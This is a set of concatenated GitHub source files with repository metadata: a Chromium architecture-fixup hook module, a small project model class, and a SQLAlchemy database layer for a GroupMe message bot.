"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "buildservice/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1471"
},
{
"name": "Makefile",
"bytes": "312"
},
{
"name": "Python",
"bytes": "22923"
},
{
"name": "Shell",
"bytes": "137"
},
{
"name": "Smarty",
"bytes": "206"
}
],
"symlink_target": ""
}
|
"""A module for architecture output directory fixups."""
from __future__ import print_function
import cr
class _ArchInitHookHelper(cr.InitHook):
"""Base class helper for CR_ARCH value fixups."""
def _VersionTest(self, old_version):
_ = old_version
return True
def _ArchConvert(self, old_arch):
return old_arch
def Run(self, old_version, config):
if old_version is None or not self._VersionTest(old_version):
return
old_arch = config.OVERRIDES.Find(cr.Arch.SELECTOR)
new_arch = self._ArchConvert(old_arch)
if new_arch != old_arch:
print('** Fixing architecture from {0} to {1}'.format(old_arch, new_arch))
config.OVERRIDES[cr.Arch.SELECTOR] = new_arch
class WrongArchDefaultInitHook(_ArchInitHookHelper):
"""Fixes bad initial defaults.
In the initial versions of cr before output directories were versioned
it was writing invalid architecture defaults. This detects that case and sets
the architecture to the current default instead.
"""
def _VersionTest(self, old_version):
return old_version <= 0.0
def _ArchConvert(self, _):
return cr.Arch.default.name
class MipsAndArmRenameInitHook(_ArchInitHookHelper):
"""Fixes rename of Mips and Arm to Mips32 and Arm32."""
def _ArchConvert(self, old_arch):
if old_arch == 'mips':
return cr.Mips32Arch.GetInstance().name
if old_arch == 'arm':
return cr.Arm32Arch.GetInstance().name
return old_arch
|
{
"content_hash": "5e0e679874c8717462454baa0a069d42",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 80,
"avg_line_length": 28.568627450980394,
"alnum_prop": 0.7021276595744681,
"repo_name": "chromium/chromium",
"id": "837a1f9dc6c79b22784b24bb5fb94661e8bb7b6f",
"size": "1598",
"binary": false,
"copies": "7",
"ref": "refs/heads/main",
"path": "tools/cr/cr/fixups/arch.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""
Model for Projects
Copyright (C) 2020 Anders Lowinger, anders@abundo.se
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
"""
from orderedattrdict import AttrDict
class Project(AttrDict):
_primary_key = "_id"
def __init__(self):
super().__init__()
self.activityid = -1
self.name = ""
self.active = 1
|
{
"content_hash": "aaaefa49914bc35cf674ae7421aa26ca",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 70,
"avg_line_length": 28.84375,
"alnum_prop": 0.7193932827735645,
"repo_name": "lowinger42/ergotime",
"id": "c79dd350fbe963ce6762552fe1d3e0d4e06ad8ed",
"size": "946",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "common/project.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "434"
},
{
"name": "HTML",
"bytes": "11748"
},
{
"name": "JavaScript",
"bytes": "497"
},
{
"name": "Python",
"bytes": "212922"
},
{
"name": "Shell",
"bytes": "146"
}
],
"symlink_target": ""
}
|
import os
import psycopg2
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from os.path import join, dirname
database_url = os.environ.get("DATABASE_URL")
engine = create_engine(database_url)
Base = declarative_base(engine)
meta=MetaData(bind=engine)
# All my db table connections
last_msg = Table('last_msg', meta, autoload=True, autoload_with=engine, schema='bot')
people = Table('people', meta, autoload=True, autoload_with=engine, schema='bot')
groups = Table('groups', meta, autoload=True, autoload_with=engine, schema='bot')
# Store the most recent msg of every group in last_msg
def store_last_msg(groupId, msgId, msgText, name, senderId):
conn = engine.connect()
print("Storing last msg")
s = select([last_msg]).where(last_msg.c.group_id == groupId)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("Insert msg")
ins = last_msg.insert().values(group_id = groupId, msg_id = msgId, msg_txt = msgText,\
sender_name = name, sender_id = senderId)
result = conn.execute(ins)
else:
print("Update msg")
upd = last_msg.update().where(last_msg.c.group_id == groupId).\
values(group_id = groupId, msg_id = msgId, msg_txt = msgText, sender_name = name, sender_id = senderId)
result = conn.execute(upd)
result.close()
conn.close()
print("Done storing msg")
# Retrieve the last message from a group
def find_last_msg(groupId):
conn = engine.connect()
print("Finding last msg")
s = select([last_msg.c.msg_txt, last_msg.c.sender_name, last_msg.c.sender_id]).where(last_msg.c.group_id == groupId)
result = conn.execute(s)
row = result.fetchone()
if not row:
print("No group by that name")
return None
else:
print("Found message")
return row
result.close()
conn.close()
print("Done finding last message")
# Add a person to the people table
def add_person(userId, name):
conn = engine.connect()
print("Adding person")
s = select([people]).where(people.c.user_id == userId)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("Insert person")
ins = people.insert().values(user_id = userId, current_name = name)
result = conn.execute(ins)
else:
print("Update person")
upd = people.update().where(people.c.user_id == userId).values(user_id = userId, current_name = name)
result = conn.execute(upd)
result.close()
conn.close()
print("Done adding person")
# Add a group to the groups table
def add_group(groupId, botId):
conn = engine.connect()
print("Adding group")
s = select([groups]).where(groups.c.group_id == groupId)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("Insert group")
ins = groups.insert().values(group_id = groupId, bot_id = botId)
result = conn.execute(ins)
else:
print("Update group")
upd = groups.update().where(groups.c.group_id == groupId).values(bot_id = botId)
result = conn.execute(upd)
result.close()
conn.close()
print("Done adding group")
# Find the bot id based on nickname
def find_bot_nname(nname):
conn = engine.connect()
print("Finding bot id from nickname")
s = select([groups.c.bot_id]).where(groups.c.nickname == nname)
result = conn.execute(s)
row = result.fetchall()
if not row:
print("No bot here")
return None
else:
print("Found bot")
return row
result.close()
conn.close()
print("Done finding bot id")
# Show all other availble bots for ventriloquism
def show_all_dummy():
conn = engine.connect()
print("Showing all dummies")
s = select([groups.c.nickname])
result = conn.execute(s)
row = result.fetchall()
if not row:
print("No dummy bots")
return None
else:
print("Got all dummies")
return row
result.close()
conn.close()
print("Done showing dummies")
# Get a user's id based on their name from the people table
def get_user_id(user_name):
conn = engine.connect()
print("Finding user id")
s = select([people.c.user_id]).where(people.c.current_name == user_name)
result = conn.execute(s)
row = result.fetchone()
if not row:
print("No person currently has that name")
return None
else:
print("Found "+ user_name + "'s id")
return row
result.close()
conn.close()
print("Done finding user id")
# Check if a bot is currently silenced
def check_silenced(botId):
conn = engine.connect()
print("Checking bot silence")
s = select([groups.c.is_silenced]).where(groups.c.bot_id == botId)
result = conn.execute(s)
row = result.fetchone()
if not row:
print("No group with that bot")
return None
else:
print("Found bot's group")
return row
result.close()
conn.close()
print("Done checking silence")
# Silence or awaken a particular bot
def silence_awaken_bot(botId, status):
conn = engine.connect()
print("Silence/awakening bot")
s = select([groups.c.is_silenced]).where(groups.c.bot_id == botId)
result = conn.execute(s)
row = result.fetchone()
if not row:
print("No group with that bot")
return None
else:
print("Bot's group found")
upd = groups.update().where(groups.c.bot_id == botId).values(is_silenced = status)
result = conn.execute(upd)
result.close()
conn.close()
print("Done silence/awakening bot")
|
{
"content_hash": "686d21f61401163f50f1b1ee820745b8",
"timestamp": "",
"source": "github",
"line_count": 179,
"max_line_length": 120,
"avg_line_length": 32.42458100558659,
"alnum_prop": 0.6171605789110958,
"repo_name": "Boijangle/GroupMe-Message-Bot",
"id": "ec990661a8dfd9d2442b3cdb854e2c4cbc3b1524",
"size": "5804",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "database.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26158"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.